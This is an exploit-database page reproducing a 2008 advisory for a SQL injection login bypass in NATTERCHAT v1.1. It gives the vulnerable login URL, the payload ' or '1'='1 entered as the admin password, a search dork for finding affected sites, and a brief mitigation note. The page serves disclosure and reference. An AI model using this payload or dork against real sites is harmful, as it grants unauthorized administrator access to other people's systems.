header-logo
Suggest Exploit
vendor:
NATTERCHAT
by:
Bl@ckbe@rD ('Tunisian TerrorisT')
7.5
CVSS
HIGH
Login Bypass
89
CWE
Product Name: NATTERCHAT
Affected Version From: NATTERCHAT v1.1
Affected Version To: NATTERCHAT v1.1
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

NATTERCHAT v1.1 remote login bypass

Go to the Login page http://www.exemple.ff/chat/nattechat/home.asp, enter Username: admin and Password: ' or '1'='1. This will bypass the login page as the query is always true.

Mitigation:

Ensure that user input is properly validated and sanitized before being used in an SQL query.
Source

Exploit-DB raw data:

[+] Script Name         : NATTERCHAT v1.1 remote login bypass

[+] Author         : Bl@ckbe@rD ('Tunisian TerrorisT') 

[+] Contact        : blackbeard-sql[A.T]hotmail{.}fr ;

[+] Dork           : Powered by NATTERCHAT v 1.1

--//-->

[+] Expl0iT :

1) Go to the Login page http://www.exemple.ff/chat/nattechat/home.asp

2) Username : admin  

   Password : ' or '1'='1

3) You are the Admin now!

N.B : U can aplly an SQL query in both (Username or Password) but we done only ' or '1'='1 coz it's always true then we can simply bypass the login page


--//-->

[+] Greetz : hak3r-b0y , Underz0ne Crew , king Of Hacker , Zigma , micro0x02 ... 

# milw0rm.com [2008-11-20]

Navigation

Suggest Exploit

Services By CQR